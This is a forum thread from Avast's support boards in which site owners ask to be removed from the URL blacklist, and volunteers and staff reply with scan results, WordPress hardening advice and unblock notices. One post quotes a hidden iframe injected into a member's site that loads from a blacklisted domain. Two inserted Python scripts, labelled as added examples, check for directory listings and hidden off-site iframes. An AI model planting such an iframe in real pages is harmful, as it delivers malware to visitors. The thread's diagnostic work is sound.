Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on August 25, 2015, 09:51:42 PM
Quote
My website, phase4fs.com, has also been blacklisted.  We fixed the DNS issue and it's now on GoDaddy servers.  All scans have been done and passed and there was never any viral activity.  Please de-list the site and reply back to my email or here to let me know.  Thanks


(http://i.imgur.com/KoxKqkI.png)

Hello

Sorry for the inconvenience

https://phase4fs.com is no longer blocked, fixed by Avast.
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on August 26, 2015, 09:54:15 PM
Quote
Hi.  Our client's website is being blocked by Avast antivirus.  The domain is http://rsjcpa.com/

We have scanned and verified that there is nothing malicious on the domain.  We have scanned every known blacklist and everything comes up clean.  Sucuri, VirusTotal, etc.

How do we request a scan, confirmation and removal from the Avast blocked list?

Thank you in advance for any assistance?

-Scott

Hello

it was FP (false positive).

Quote from: Rojan Piya
It should be fixed in the new virus definition update VPS

Title: Re: How to remove my website from your blacklist?
Post by: Guilherme65 on September 02, 2015, 11:34:49 PM
Hello, can you remove my site from blacklist? :/  www.abinpet.org.br/
http://www.urlvoid.com/scan/abinpet.org.br/
It is an institutional site.

Thanks a lot.



Hello, could you remove my site from the blacklist? :/ www.abinpet.org.br/
http://www.urlvoid.com/scan/abinpet.org.br/
It is an institutional site.

Thank you very much.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on September 02, 2015, 11:52:46 PM
Website is infected    https://sitecheck.sucuri.net/results/www.abinpet.org.br/

Killmalware   www.killmalware.com/abinpet.org.br/site/


https://www.virustotal.com/nb/file/fd1f20fdb19d00f27dcec4aa48652ba5b0c2307f5552a4ca73c851715ef66b44/analysis/1441231069/


Title: Re: How to remove my website from your blacklist?
Post by: Guilherme65 on September 03, 2015, 09:07:37 AM
I removed the iframe!
Thanks for help ! :)

http://killmalware.com/abinpet.org.br/site#

Can you remove-me from the blacklist now?

Thanks!
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on September 03, 2015, 09:28:41 AM
report it here  https://support.avast.com/ -> avast virus lab

Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on September 03, 2015, 09:40:01 AM
Hi,
The URL abinpet.org.br was never on our blacklist.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on September 03, 2015, 09:44:01 AM
I guess that means avast only detected the iFrame and when that is removed detection should be gone

https://www.virustotal.com/en/file/fd1f20fdb19d00f27dcec4aa48652ba5b0c2307f5552a4ca73c851715ef66b44/analysis/1441231069/

Sucuri   https://sitecheck.sucuri.net/






Title: Re: How to remove my website from your blacklist?
Post by: polonus on September 03, 2015, 10:04:11 AM
Can be normally visited, AOS does not flag.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: david765 on September 10, 2015, 06:06:49 PM
Can you tell me why my site is blocked? It comes up clean in every scan I have run.

http://www.eanescomfort.com

Thanks.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on September 10, 2015, 06:51:59 PM
Probably a general IP block. Re: https://www.virustotal.com/nl/ip-address/65.75.137.200/information/
There are however jQuery vulnerability issues on that site: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fwww.eanescomfort.com
Sucuri and Quttera give the site as clean.
WP issues: WordPress Plugins
The following plugins were detected by reading the HTML source of the WordPress sites front page.

wp-live-chat-support   latest release (5.0.5)
http://www.wp-livechat.com
wp-google-maps   latest release (6.3.00)
http://www.wpgmaps.com
revslider   
js_composer   
go_pricing   
icegram   latest release (1.9.6)
http://www.icegram.com/
recent-tweets-widget   latest release (1.6.4)
http://wordpress.org/extend/plugins/recent-tweets-widget/
Ultimate_VC_Addons   
table-generator   latest release (1.2)
http://wpgurus.net/
srizon-youtube-album-pro   
contact-form-7   latest release (4.2.2)
http://contactform7.com/
constant-contact   latest release (10.3)
http://www.gopiplus.com/work/2010/07/18/constant-contact/

Theme: The theme has been found by examining the path /wp-content/themes/ *theme name* /

 The7.2 1.0.1 http://dream-theme.com/

Warning User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.

User ID 1 : admin
User ID 2 : John Eanes
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. However it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

Warning Directory Indexing Enabled
In the test we attempted to list the directory contents of the uploads and plugins folders to determine if Directory Indexing is enabled. This is an information leakage vulnerability that can reveal sensitive information regarding your site configuration or content.

/wp-content/uploads/ enabled

Linked iFrames
Compromised sites will often contain embedded iframes that can also deliver malicious code to visitors of the web site. Check any discovered iframes and ensure they are legitimate.

http://www.youtube.com/embed/eAquQaiPs3E?feature=oembed

You could try to configure according to my recommendations so as to no longer get the warnings. Ask Avast to exclude you from their general blocking.
We cannot unblock as we are only volunteers with relevant knowledge, but no Avast team members, they are the only ones to unblock.

Also consider some DNS issues found up here: http://www.dnsinspect.com/eanescomfort.com/1441902253
WARNING: MX records duplicates (same IP address):
64.233.162.27: [alt1.aspmx.l.google.com. aspmx2.googlemail.com.]
Although technically valid, duplicate MX records have no benefits and can cause confusion.
WARNING: Found mail servers with inconsistent reverse DNS entries. You should fix them if you are using those servers to send email.
Server   IP   PTR (Reverse)   IPs
aspmx.l.google.com.   64.233.167.27   ?   ?

See: http://sitevet.com/db/asn/AS36444
IP commonName=*.asoshared.com  OpenSSH 5.3 (protocol 2.0) Exim smtpd 4.85 draenor.asoshared.com
http/1.1
|_  x-mod-spdy/0.9.4.3-146826
Service Info: Host: draenor.asoshared.com Redwood.City
-http://cse.google.com/cse?cx=partner-pub-7151396906610147:7uzfly-ti4n&q

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: david765 on September 10, 2015, 08:54:00 PM
Thanks. What's the best way to contact them to have it excluded?
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on September 10, 2015, 09:20:07 PM
Contact here
Submit a ticket at https://support.avast.com/Tickets/Submit

-> Avast Virus lab
Title: Re: How to remove my website from your blacklist?
Post by: david765 on September 10, 2015, 09:21:11 PM
Thanks!
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on September 10, 2015, 09:27:20 PM
You are welcome !
Title: Re: How to remove my website from your blacklist?
Post by: ozioeh on September 15, 2015, 09:19:28 PM
Hi,
my site

http://www.woomyung.com/
 has been blocked (url mal) for a long time.

I tested using almost all recommended web checking sites, but didn't find any issue.
And I continuously reported it as a false positive, but it didn't change.

thank you.

 




Title: Re: How to remove my website from your blacklist?
Post by: polonus on September 15, 2015, 10:32:09 PM
DNS issue: Allow TCP connections
WARNING: Couldn't connect using TCP protocol:
tcp4:1.201.102.134
Check your name server's configurations and firewall rules. When response to a DNS query exceeds 512 bytes, TCP is negotiated and used, all name servers should allow TCP connections (port 53).
Did not follow redirect to http://www.ec2-54-191-33-241.us-west-2.compute.amazonaws.com/
Website risk status 7 red out of 10: http://toolbar.netcraft.com/site_report?url=http://www.ec2-54-191-33-241.us-west-2.compute.amazonaws.com
jquery.easing.1.3.js hacked for hotlinking?
See: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fwoomyung.com

See no direct known threats, wait for an explanation from Avast team for the URL:Mal general detection.
Reason for the general detection is probably the nameserver: Domain found using -*.whoisdomain.kr as name server
see: http://www.malwareurl.com/ns_listing.php?ns=ns4.whoisdomain.kr  with trojans and backdoors.

polonus (volunteer website security analyst and website error-hunter)


Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on September 16, 2015, 08:48:30 AM
Re eanescomfort.com:
The URL was removed from our blacklist yesterday - most likely based on your report.

Re woomyung.com:
It was added to our blacklist because of DNS hijack. I hope the matter is now resolved, so I am unblocking the domain now.
Title: Re: How to remove my website from your blacklist?
Post by: ozioeh on September 16, 2015, 01:57:28 PM
Thank you so much
Title: Re: How to remove my website from your blacklist?
Post by: Krzysztof60 on October 16, 2015, 02:58:59 PM
Hello,
my site www.krzysztofkarpinski.pl is on Your blacklist.

Users who use AVAST can not get to my site.
The website is now clean and safe - confirm you can find here www.siteadvisor.com
What can I do to remove the page from your blacklist?
Title: Re: How to remove my website from your blacklist?
Post by: polonus on October 16, 2015, 04:46:52 PM
Hello, Mr. Krzysztof!

This comes in English because this part of the forums is,

Fortinet webfilter is flagging the website, https://www.virustotal.com/nl/url/24a3718291ca18b88cba3d7832b39336b28136c90eab8cf2b7b625c7000ccdac/analysis/1445003923/

By the way you have the following WP misconfiguration:Warning Directory Indexing Enabled
In the test we attempted to list the directory contents of the uploads and plugins folders to determine if Directory Indexing is enabled. This is an information leakage vulnerability that can reveal sensitive information regarding your site configuration or content.

/wp-content/uploads/ enabled
/wp-content/plugins/ disabled

Directory indexing was tested on the /wp-content/uploads/ and /wp-content/plugins/ directores. Note that other directories may have this web server feature enabled, so ensure you check other folders in your installation. It is good practice to ensure directory indexing is disabled for your full WordPress installation either through the web server configuration or .htaccess.

Vuln.: Results from scanning URL: http://krzysztofkarpinski.pl/wp-includes/js/jquery/jquery.js?ver=e237b87e9ac201aedbe95acc6d03803a
Number of sources found: 43
Number of sinks found: 19

Also considering the discussion here: https://productforums.google.com/forum/#!topic/webmaster-pl/d6rq5mBbpCc (in Polish)  Do a scan here: urlquery dot net and there you will see what Fortinet flags. Wait until back online as it now is down.
Avast flags a general URL:Mal alert for chrome.exe.

My bet is the problem is not with your site but the hoster, see badness history (trojans and droppers) https://www.virustotal.com/nl/ip-address/87.98.239.87/information/

Regards,

Damian aka polonus (volunteer website security analyst and website error-hunter)
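
A way to re-run the directory indexing test from the post above on your own site's responses, as an added example that is not part of the original post or of any scanner it quotes. The responses, file names and the list of sensitive suffixes are constructed assumptions; in practice the `(path, status, body)` tuples would come from fetching your own `/wp-content/` folders.

```python
import re
from html.parser import HTMLParser

# Markers that auto-generated listing pages carry.
LISTING_SIGNATURES = [
    ("autoindex (Apache/nginx style)", re.compile(r"<title>\s*Index of\s+/", re.I)),
    ("IIS directory browsing", re.compile(r"\[To Parent Directory\]", re.I)),
]

# Assumed list of file types that should never be browsable in an uploads folder.
SENSITIVE_SUFFIXES = (".sql", ".bak", ".old", ".log", ".zip", ".tar.gz", ".tgz")


class _LinkCollector(HTMLParser):
    """Collect the href of every <a> tag in document order."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.hrefs.append(href)


def listed_entries(body):
    """Return the file and folder names a listing page exposes."""
    collector = _LinkCollector()
    collector.feed(body)
    # Skip column-sort links (?C=N;O=D), parent links and absolute paths.
    return [h for h in collector.hrefs if not h.startswith(("?", "/", ".."))]


def check_directory(path, status, body):
    """Classify one HTTP response for a directory URL."""
    style = None
    if status == 200:  # a 403/404 means the listing is not served
        for name, pattern in LISTING_SIGNATURES:
            if pattern.search(body):
                style = name
                break
    entries = listed_entries(body) if style else []
    return {
        "path": path,
        "indexing_enabled": style is not None,
        "style": style,
        "entries": entries,
        "sensitive": [e for e in entries if e.lower().endswith(SENSITIVE_SUFFIXES)],
    }


# Constructed sample responses: uploads is browsable, plugins is forbidden,
# themes returns an empty index page.
SAMPLE_RESPONSES = [
    ("/wp-content/uploads/", 200, """<html><head><title>Index of /wp-content/uploads</title></head>
<body><h1>Index of /wp-content/uploads</h1><table>
<tr><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th></tr>
<tr><td><a href="/wp-content/">Parent Directory</a></td></tr>
<tr><td><a href="2015/">2015/</a></td></tr>
<tr><td><a href="backup-2015.sql">backup-2015.sql</a></td></tr>
<tr><td><a href="logo.png">logo.png</a></td></tr>
<tr><td><a href="site.tar.gz">site.tar.gz</a></td></tr>
</table></body></html>"""),
    ("/wp-content/plugins/", 403,
     "<html><head><title>403 Forbidden</title></head><body>Forbidden</body></html>"),
    ("/wp-content/themes/", 200, ""),
]


def audit(responses):
    """Run check_directory over a list of (path, status, body) tuples."""
    return [check_directory(path, status, body) for path, status, body in responses]


if __name__ == "__main__":
    for result in audit(SAMPLE_RESPONSES):
        state = "enabled" if result["indexing_enabled"] else "disabled"
        print(result["path"], state, result["sensitive"])
```

On Apache, `Options -Indexes` in the server configuration or in .htaccess turns the listing off.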

Title: Re: How to remove my website from your blacklist?
Post by: polonus on October 16, 2015, 10:40:08 PM
Re: http://urlquery.net/report.php?id=1445027045186
The malware flagged  detected by Fortinet's, verified on 2015-10-16
18 suspicious files on IP see: http://urlquery.net/report.php?id=1444685724978
You certainly should take things up with the hoster - Blacklisted URLs: 11864
22 instances of malware on another domain with that same IP.  :o

polonus
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on October 18, 2015, 10:03:51 AM
Unblocked ;-)
The reason was money fraud at krzysztofkarpinski.pl/log/kmart.tar.gz, in case anyone is wondering :-)
Title: Re: How to remove my website from your blacklist?
Post by: Krzysztof60 on October 19, 2015, 02:02:06 PM
AVAST actually no longer blocks my website - thank you :)

Polonus - thank you for your commitment and a large amount of valuable information.
Indexing already disabled - I think so :)
As for the rest I have to ask for help from someone who knows how and what to do next;)

Anyway - Thank you for your help :D
Title: Re: How to remove my website from your blacklist?
Post by: polonus on October 19, 2015, 03:14:24 PM
For expert help you might contact Redleg, the man behind File Viewer -> https://aw-snap.info/file-viewer/
It is free of charge.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: rich35 on October 30, 2015, 08:19:30 PM
Hi,

Can you unblock our website illo-online.com please.

Title: Re: How to remove my website from your blacklist?
Post by: essexboy on October 30, 2015, 10:13:29 PM
Received this in addition to the avast certificate warning

Quote
Turn on TLS 1.0, TLS 1.1 and TLS 1.2 in Advanced settings and try connecting to https://illo-online.com  again. If this error persists, it is possible that this site uses an unsupported protocol. Please contact the site administrator.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on November 02, 2015, 03:55:49 PM
hxxps://illo-online.com/

Secure connection: fatal error (44)

The certificate has been revoked by its issuer.
It is no longer valid.
In the worst case it may be used by criminals for fraudulent purposes.
The website owner must immediately replace the certificate.
Title: Re: How to remove my website from your blacklist?
Post by: Andrey101 on November 12, 2015, 01:31:55 PM
Hi
could you please remove images on iamsync.com from blacklist?
For example the image is blocked: https://iamsync.com/organization/css/img/copyright.gif
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on November 12, 2015, 01:57:46 PM
avast is not blocking that image.
There is a IP block.
http://zulu.zscaler.com/submission/show/552fe507ef8d9998627cc44dee08ba31-1447332474
http://multirbl.valli.org/lookup/54.93.111.46.html

NS and MX problems
http://www.dnsinspect.com/iamsync.com/1447332843

For removal requests
https://www.avast.com/contact-form.php?subject=VIRUS-FILE
Title: Re: How to remove my website from your blacklist?
Post by: TT-111 on November 17, 2015, 12:46:31 PM
Please remove my webpage from blacklist.  Site: www.meveda.ee

We have removed the malware.

Thanks!
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on November 17, 2015, 12:53:32 PM
People, do NOT post live links to websites that avast is blocking.
We do not want anyone to visit websites that are (potentially) harmful.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on November 17, 2015, 12:57:12 PM
Quote
Please remove my webpage from blacklist.  Site: www.meveda.ee

We have removed the malware.

Thanks!

It contains Pharmacy spam   https://sitecheck.sucuri.net/results/www.meveda.ee

Title: Re: How to remove my website from your blacklist?
Post by: TT-111 on November 17, 2015, 03:49:53 PM
Yep, it contained spam. It has been removed by now.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on November 17, 2015, 04:07:14 PM
Sucuri still reports it  https://sitecheck.sucuri.net/results/www.meveda.ee

you can click the:  *Cached results from a few minutes ago. Force a Re-scan to clear the cache.

Title: Re: How to remove my website from your blacklist?
Post by: lthirteenthl on February 20, 2016, 11:09:09 AM
Hello, could you check a8d.ru and remove from blacklist. I think it doesn't contain viruses.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on February 20, 2016, 11:14:15 AM
On lots of Blacklists
https://www.virustotal.com/en/url/222c16ee2f6382642d55078006576b38c6d3bceb32a0bf03e33d2a2ac616b216/analysis/1455963222/

URLvoid  http://www.urlvoid.com/scan/a8d.ru/

IP history  https://www.virustotal.com/en/ip-address/31.170.164.166/information/
Multiple domains on same IP and many are blacklisted ... click more button under list(s) for more info

IPvoid  http://www.urlvoid.com/ip/31.170.164.166

WOT info  https://www.mywot.com/en/scorecard/a8d.ru

html scan - redirect infection
https://www.virustotal.com/en/file/9bb6058b5649b619b29b8ad439176d1aebbdf03debeaeb21e65161cae5766021/analysis/1455978532/

Title: Re: How to remove my website from your blacklist?
Post by: Eddy on February 20, 2016, 03:04:35 PM
Blacklisted, non trusted host, security risks :
http://zulu.zscaler.com/submission/show/0cb05030d9bcee771850c175af37d13c-1455976244

Blacklisted :
http://urlquery.net/report.php?id=1455976345102
http://www.siteadvisor.com/sites/a8d.ru

Blacklisted and infected :
https://sitecheck.sucuri.net/results/a8d.ru

Blacklisted, infected, links to blacklisted domains/ip's :
http://www.web-malware-removal.com/website-malware-virus-scanner/?url=a8d.ru

IDS problems on the ASN :
http://urlquery.net/report.php?id=1455976515202

Vulnerable code/security risk :
http://retire.insecurity.today/#!/scan/d415677d99fdf53d54e7df59f487926f20b1c0ed8d9dedf84671377c8b107423

Multiple SSL/TLS problems :
https://www.ssllabs.com/ssltest/analyze.html?d=a8d.ru
Title: Re: How to remove my website from your blacklist?
Post by: polonus on February 20, 2016, 03:23:26 PM
Hi Eddy,

In scanning the URL format may come up as invalid.
Now we see MX and Mail issues here: http://www.dnsinspect.com/a8d.ru/1455977996
Although we have currently not seen any ZeuS C&Cs resolved thru the DNS Nameserver ns2.hostinger.ru.

If that is not convincing enough then see the 18 reports here: https://www.mywot.com/en/scorecard/a8d.ru?utm_source=addon&utm_content=popup
Scareware and scammer site. Avast Online Security flags this site as "unsafe".

When we consider this little scan and where it comes to land we see they are also 'pill ad-scammers':
http://www.domxssscanner.com/scan?url=http%3A%2F%2Fa8d.ru%2Fjs%2Fbootstrap.min.js
going to: Results from scanning URL: -https://adf.ly/fp.rev3.php?nocache=1
Number of sources found: 38
Number of sinks found: 21
and where we luckily do not find sources detected:
Results from scanning URL: -http://static.adf.ly/static/js/view58.js
Number of sources found: 0
Number of sinks found: 2

Going to the link I gave  -http://a8d.ru/js/bootstrap.min.js I get three warnings kicked up to stay away: one from WOT, one from AOS and one from Bitdefender TrafficLight.
The website certainly should get off of all these blacklistings and clean their bill of web rep to again get unblocked it seems.
But the final verdict should as always come from an Avast Team Member of course, we here are just volunteers with relevant know-how.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: polonus on February 20, 2016, 03:41:48 PM
Update (info credits and thanks go out to our forum friend, Pondus)

Sophos has this message
Quote
-a8d.ru/#

Access to this page is blocked as the threat Mal/HTMLGen-A has been found on this website.

polonus

Well what code is actually being flagged there as we find these as scripts included:
-js/jquery-1.8.3.min.js
-js/bootstrap.min.js
-js/main.js
-http://html5shim.googlecode.com/svn/trunk/html5.js
-http://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js

Damian
Title: Re: How to remove my website from your blacklist?
Post by: Наталья26 on February 21, 2016, 07:49:41 AM
Good day! Avast blocks the site webcam-arabatka.in.ua the web site has revealsa viruses on it. Please help me to understand. :o :o :o
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on February 21, 2016, 07:54:24 AM
-> https://sitecheck.sucuri.net/results/webcam-arabatka.in.ua
Title: Re: How to remove my website from your blacklist?
Post by: polonus on February 21, 2016, 10:31:13 PM
There is this iFrame there:
Code:
<iframe id="a1996667054" style="display: none;" src="-https://al9l235gkc7d.ru/f.html" width="300" height="150"></iframe>
Javascript included from a blacklisted domain. Details: http://sucuri.net/malware/entry/MW:BLK:2
Javascript: -al9l235gkc7d.ru

Linked javascript check:
Vulnerable jQuery library: -http://webcam-arabatka.in.ua
Detected libraries:
jquery-migrate - 1.2.1 : -http://webcam-arabatka.in.ua/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
jquery - 1.11.3 : -http://webcam-arabatka.in.ua/wp-includes/js/jquery/jquery.js?ver=1.11.3
jquery - 2.1.4 : (active1) -http://webcam-arabatka.in.ua/wp-content/themes/byzantium/js/jquery-2.1.4.min.js?ver=20151029
(active) - the library was also found to be active by running code
1 vulnerable library detected

With WordPress check on this plug-in:

ditty-news-ticker   latest release (2.0.6) *
http://dittynewsticker.com/

Warning User Enumeration is possible  :o admin-webcam and denis -> It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. However it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

Script blockers will block link to: -http://w.uptolike.com/

polonus (volunteer website security analyst and website error-hunter)
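
A check a site owner can run over their own pages for the pattern reported above (an iframe hidden with `display: none` that loads from an off-site host), as an added example that is not part of the original post. The sample page, the host names under the reserved `.example` TLD and the allow-list are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

CSS_HIDDEN = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
OFF_SCREEN = re.compile(r"(?:left|top)\s*:\s*-\d{3,}", re.I)
TINY_DIMENSION = re.compile(r"\s*[01]\s*(?:px)?\s*", re.I)


class _IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> tag in document order."""

    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            # A bare attribute such as `hidden` arrives with value None.
            self.frames.append({name: (value or "") for name, value in attrs})


def hidden_reasons(attrs):
    """List the ways an iframe is kept out of the visitor's sight."""
    reasons = []
    style = attrs.get("style", "")
    if CSS_HIDDEN.search(style):
        reasons.append("css-hidden")
    if OFF_SCREEN.search(style):
        reasons.append("off-screen")
    for dim in ("width", "height"):
        if TINY_DIMENSION.fullmatch(attrs.get(dim, "")):
            reasons.append(dim + "<=1")
    if "hidden" in attrs:
        reasons.append("hidden-attr")
    return reasons


def audit_iframes(html, site_host, allowed_hosts=()):
    """Return one finding per iframe, rated high / review / ok."""
    collector = _IframeCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.frames:
        src = attrs.get("src", "")
        host = urlparse(src).hostname  # None for relative (same-site) URLs
        external = (host is not None and host != site_host
                    and not host.endswith("." + site_host))
        allowed = host in allowed_hosts
        reasons = hidden_reasons(attrs)
        if external and not allowed and reasons:
            severity = "high"      # hidden frame from an unknown third party
        elif reasons or (external and not allowed):
            severity = "review"    # hidden same-site frame or unknown visible embed
        else:
            severity = "ok"
        findings.append({"src": src, "host": host, "external": external,
                         "reasons": reasons, "severity": severity})
    return findings


# Constructed sample page: a hidden off-site frame, a visible video embed
# and a zero-sized same-site frame.
SAMPLE_HTML = """
<html><body>
<h1>Webcam</h1>
<iframe id="a1" style="display: none;" src="https://injected.example/f.html" width="300" height="150"></iframe>
<iframe width="560" height="315" src="https://www.youtube.com/embed/VIDEO_ID?feature=oembed"></iframe>
<iframe src="/local/map.html" width="0" height="0"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for finding in audit_iframes(SAMPLE_HTML, "site.example", {"www.youtube.com"}):
        print(finding["severity"], finding["src"], finding["reasons"])
```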
Title: Re: How to remove my website from your blacklist?
Post by: qsilvererie on February 26, 2016, 01:54:34 AM
My personal website is now coming up blocked as URL:Mal. I've checked with Sucuri, urlvoid, surbl, everything says it's not blocked. This is really starting to drive me nuts. hxxp://qsilver.dx.am. Why is this getting blocked?
Title: Re: How to remove my website from your blacklist?
Post by: medvid on February 26, 2016, 11:16:10 AM
it will be fixed in next VPS
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on February 26, 2016, 08:11:47 PM
Quote
Please remove my webpage from blacklist.  Site: www.meveda.ee

We have removed the malware.

Thanks!

Detection site was removed

Quote
Good day! Avast blocks the site webcam-arabatka.in.ua the web site has revealsa viruses on it. Please help me to understand. :o :o :o

this was fixed in the update VPS 160225-1
Title: Re: How to remove my website from your blacklist?
Post by: polonus on February 26, 2016, 08:17:31 PM
Good it was removed from blocking,
but now also mitigate the issues reported,
to harden the website's security.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on February 27, 2016, 12:48:57 AM
a8d.ru unblocked ;)
Title: Re: How to remove my website from your blacklist?
Post by: qssam on February 29, 2016, 12:59:32 PM
Hello,

Our website is currently being blocked by Avast: www.quietstorm.net

With the infection message: URL:Mal

We have checked the site with the following, all showing no problems:-

http://www.urlvoid.com/scan/quietstorm.net/
https://www.virustotal.com/en/url/a3b869526c5ff261f695347ad847f5f6d62e15ea29f391a3a28264da0ea39f04/analysis/1456744348/
http://zulu.zscaler.com/submission/show/109fbf37214e065fc06ffa1d73a17128-1456744681
https://sitecheck.sucuri.net/results/www.quietstorm.net/
http://urlquery.net/report.php?id=1456744940589

Thank you.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on February 29, 2016, 01:15:42 PM
quietstorm.net unblocked ;)
Title: Re: How to remove my website from your blacklist?
Post by: jllj on March 11, 2016, 06:46:07 AM
Hello,

Our website is currently being blocked by Avast: www.hansafincon.com
With the infection message: URL:Mal

We checked the site with the following, all showing no problems:

http://www.urlvoid.com/scan/hansafincon.com/
https://www.virustotal.com/en/url/cc4bf887bc51e38518d767a6c0acfc87b62c028a798d6fafda414a3f86c888e8/analysis/
https://sitecheck.sucuri.net/results/hansafincon.com

Pls remove the site from blacklist.

Thank you.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 11, 2016, 09:54:51 AM
hansafincon.com unblocked ;)
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on March 11, 2016, 11:42:12 AM
jllj
you also need to fix the JQuery problem
http://retire.insecurity.today/#!/scan/417e214065db7ed2d4934bb7caa2e9055100e21051a83cf55452c3d35dc49bca
Title: Re: How to remove my website from your blacklist?
Post by: polonus on March 11, 2016, 02:10:27 PM
I still find it blocked by Avast as with URL:Mal - http://isithacked.com/check/hansafincon.com

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Jon98 on March 14, 2016, 07:35:35 PM
Hello,

My website is currently being blocked by Avast  :( : www.mega-telechargement.com and www.drague-seduction.com

We checked the site with the following, all showing no problems:

https://www.virustotal.com/en/url/0f8f9b4c22b022d29992ba9a23697928ab7ed7c966fc564ef9e621f075aec232/analysis/
https://sitecheck.sucuri.net/results/www.mega-telechargement.com

Please remove the site from blacklist.

Thank you.

ps: sorry for my poor English, I am French  :)
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on March 14, 2016, 08:37:47 PM
It's been reported to Avast. :)
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on March 14, 2016, 08:42:07 PM
I believe the image says enough.

And this also tells enough :
https://gcache.ghostery.com/en/gcache/?n=TWFsd2FyZQ%3D%3D&s=aHR0cDovL3d3dy5qdXF1ZXJ5LmNvbS9jb21wYWJpbGl0eS5waHA%2FMC4xNjc1MzI0MjY3NDE3Mjcy
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 15, 2016, 10:01:13 AM
mega-telechargement.com unblocked;
drague-seduction.com was never blocked.
Title: Re: How to remove my website from your blacklist?
Post by: Pavel137 on March 29, 2016, 08:46:51 PM
Hi, some of my sites are in the blacklist, but they are clean

http://allonltd.com.ua/

https://www.virustotal.com/uk/url/f2838378f2e2532357cbdc921ede9b0dc36752c14d4fc7110f4e2528d06ff897/analysis/1459276495/
https://sitecheck.sucuri.net/results/allonltd.com.ua/
http://zulu.zscaler.com/submission/show/c0353fa9206818555923b5192ebba52e-1459276691
http://www.urlvoid.com/scan/allonltd.com.ua/
http://urlquery.net/queued.php?id=1118276886

http://cleaning-kiev.com

http://www.urlvoid.com/scan/cleaning-kiev.com/
https://sitecheck.sucuri.net/results/Cleaning-kiev.com/
https://www.virustotal.com/uk/url/1fa9b1ada7f4bd2f9058e2cfc1808bef5cd2a7d3587f038bcc0233bcb3d1a8f4/analysis/
http://urlquery.net/queued.php?id=1118282591
http://zulu.zscaler.com/submission/show/10fb05bbd2c43e8ee99044b284c9a7e3-1459276947

http://Uborka-kiev.com

http://www.urlvoid.com/scan/uborka-kiev.com/
https://www.virustotal.com/uk/url/5371d383de197f8c40f2dc19bc989afc7b5e98ae273adce0e172db42c6a52391/analysis/
https://sitecheck.sucuri.net/results/uborka-kiev.com/
http://urlquery.net/queued.php?id=1118288391
http://zulu.zscaler.com/submission/show/983871694b1c0378e25e60fdad34f3ef-1459277063


Please remove it from blacklist. Thank you.
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on March 29, 2016, 09:14:47 PM
If they are blacklisted, please make them non clickable.
Use hxxp or hxxps
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on March 29, 2016, 09:32:24 PM
Malicious code :
http://evuln.com/tools/malware-scanner/allonltd.com.ua

Suspicious code (could be harmful) :
http://quttera.com/detailed_report/allonltd.com.ua

Suspicious script and error page :
http://www.web-malware-removal.com/website-malware-virus-scanner/?url=allonltd.com.ua

Outdated software used :
https://sitecheck.sucuri.net/results/allonltd.com.ua

IDS on the same IP :
http://urlquery.net/report.php?id=1459279177548

Missing security settings in the header(s) :
https://securityheaders.io/?q=allonltd.com.ua

JQuery security problems :
http://retire.insecurity.today/#!/scan/14f10850f7ddda03e8b13df03c20debbb8383f4e99ebb28b04bceeb3d2dc586e

It would not surprise me if avast has found more problems than the ones I listed here.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 29, 2016, 10:06:50 PM
I do not see anything malicious at allonltd.com.ua right now, so I am unblocking it.
cleaning-kiev.com and uborka-kiev.com were never blocked.
Title: Re: How to remove my website from your blacklist?
Post by: Pavel137 on March 29, 2016, 10:11:44 PM
Quote
Malicious code :
http://evuln.com/tools/malware-scanner/allonltd.com.ua

